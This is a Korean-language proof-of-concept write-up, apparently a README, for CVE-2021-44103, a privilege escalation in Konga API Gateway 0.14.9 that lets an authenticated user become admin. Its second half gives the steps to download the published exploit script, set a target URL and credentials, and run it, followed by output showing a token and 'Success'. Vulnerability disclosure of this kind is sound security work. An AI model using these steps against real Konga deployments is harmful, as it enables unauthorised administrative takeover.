
CVE-2021-44103에 대한 개념 증명 익스플로잇으로, Konga API Gateway 0.14.9에서 수직적 권한 상승을 보여주며, 인증된 사용자가 관리자 접근 권한을 얻을 수 있도록 합니다.
KONGA 0.14.9에 대한 개념 증명 - 권한 상승.
2021년 11월 16일, Fabrício Salomão와 저는 Konga API 게이트웨이에서 인증된 모든 사용자가 관리자가 될 수 있는 취약점을 발견했습니다.
제품: KONGA
모델: 0.14.9
취약점: 권한 상승
영향: 전체 관리자 액세스 (수직적 권한 상승)
인증: 필요
익스플로잇 저자: Fabricio Salomao / Paulo Trindade
아래에는 권한이 없는 "usernormal"이라는 일반 사용자가 생성되었습니다.


아래의 요청을 통해 'admin' 매개변수의 플래그 'FALSE'가 'TRUE'로 변경되었습니다.

따라서 저희를 위한 익스플로잇이 생성되었습니다: https://www.exploit-db.com/exploits/50521

익스플로잇을 실행한 후 권한 상승이 성공했습니다!
결과:

wget https://www.exploit-db.com/raw/50521 -O 50521.py
Edit 50521.py
Modify:
urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga" # change user
password = "changeme" # change password
Execute:
python 50521.py
[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
https://www.exploit-db.com/exploits/50521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103
https://github.com/advisories/GHSA-f2mp-8fgg-7465
https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821